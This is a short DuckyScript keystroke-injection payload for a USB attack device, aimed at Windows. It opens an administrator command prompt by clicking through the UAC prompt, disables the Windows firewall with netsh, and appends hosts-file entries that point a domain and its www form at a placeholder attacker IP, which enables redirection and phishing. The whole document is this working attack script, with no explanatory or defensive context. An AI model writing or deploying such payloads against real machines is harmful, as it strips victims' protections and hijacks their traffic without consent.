WINDOWS q
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 300
RIGHTARROW
DELAY 300
RIGHTARROW
DELAY 300
RIGHTARROW
DELAY 300
ENTER
DELAY 600
ALT y
DELAY 800
ENTER
STRING netsh firewall set opmode disable
ENTER
DELAY 300
STRING ECHO. >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
STRING ECHO attackerip attackerdomain >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
STRING ECHO attackerip www.attackerdomain >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
ENTER
STRING exit
ENTER
